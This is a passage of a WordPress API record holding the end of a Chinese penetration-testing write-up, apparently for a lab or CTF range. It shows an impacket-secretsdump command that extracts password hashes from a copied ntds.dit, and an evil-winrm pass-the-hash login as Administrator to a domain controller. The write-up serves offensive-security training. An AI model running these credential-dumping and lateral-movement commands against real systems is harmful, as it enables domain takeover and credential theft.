src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"686\" height=\"311\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/26.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2793\"  sizes=\"auto, (max-width: 686px) 100vw, 686px\" \/><\/div><\/figure>\n\n\n\n<p>\u6700\u540e\u7528download\u4e0b\u6765\u7684ntds.dit\u548csystem\u672c\u5730\u8fdb\u884c\u89e3\u5bc6<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>impacket-secretsdump -ntds ntds.dit -system system local<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/27.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/27.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u62ff\u4e0b\u57df\u63a7<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains evil-winrm -i 172.22.14.11 -u Administrator -H \"70c39b547b7d8adec35ad7c09fb1d277\"<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u8003\u70b9:<br \/>\n\u4fe1\u606f\u6cc4\u9732<br \/>\nJenkins\u521d\u59cb\u7ba1\u7406\u5458\u5bc6\u7801<br \/>\njenkins\u540e\u53f0RCE<br \/>\nGitlab API Token<br \/>\nOracle RCE<br \/>\nSeRestorePrivilege\u63d0\u6743<br \/>\nSPN<br \/>\n\u5377\u5f71\u62f7\u8d1d\u63d0\u53d6SAM<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11],"tags":[],"class_list":["post-2787","post","type-post","status-publish","format-standard","hentry","category-11"],"_links":{"self":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/2787","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/comments?post=2787"}],"version-history":[{"count":13,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/2787\/revisions"}],"predecessor-version":[{"id":2875,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/2787\/revisions\/2875"}],"wp:attachment":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/media?parent=2787"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/categories?post=2787"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/tags?post=2787"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}